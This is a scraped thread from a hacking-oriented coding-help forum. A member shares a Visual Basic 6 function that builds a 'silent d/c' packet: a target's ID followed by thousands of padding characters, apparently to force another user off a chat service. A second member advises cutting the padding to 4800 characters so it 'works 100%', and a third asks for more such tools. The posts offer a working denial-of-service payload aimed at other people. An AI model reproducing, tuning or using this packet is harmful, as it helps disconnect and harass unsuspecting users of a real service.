![]() |
|
|
|||||||
| Coding Help You need help coding a 'Security Application'? Ask for help in here. |
|
Welcome to the VipraSys forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features such as download links. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, Register Now by clicking here! |
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|
#2 (permalink) |
|
Junior Member
Join Date: Mar 2008
Posts: 6
Thanks: 0
Thanked 3 Times in 1 Post
Reputation: 2
![]() |
well bro im not for sure if this is what you need but for my slient d/c i use this packet and btw im coding in vb 6
Code:
Public Function DC(UserName as String, TargetID as String) as String
Dim pck as String
pck = "1" & Username & "5" & TargetID & "14" & String$(10000, "$") & "599215abca-d065-4dcf-5700-2210e666338b2589215abca-d065-4dcf-5700-2210e666338b1351.1.0310en-us33642221"
Dc = Header("E9", pck)
End Function
|
|
|
|
| The Following 3 Users Say Thank You to tokie For This Useful Post: |
|
|
#3 (permalink) |
|
-Destroyer-Messy-
|
This packet not accept >> String(10000,"$") change to >> string(4800,"$")
(string(4800,"$") << Work 100%) |
|
|
|
| The Following 2 Users Say Thank You to destroyer_messy For This Useful Post: | porkbonekid (04-03-2008), saswata (04-03-2008) |
|
|
#4 (permalink) | |
|
VipraSys Addict
![]() Join Date: Dec 2007
Location: India
Posts: 114
Thanks: 327
Thanked 72 Times in 37 Posts
Reputation: 305
![]() ![]() ![]() ![]() |
Quote:
any1 here share slient d/c plzz... ![]() ![]() |
|
|
|
|
|
|
#6 |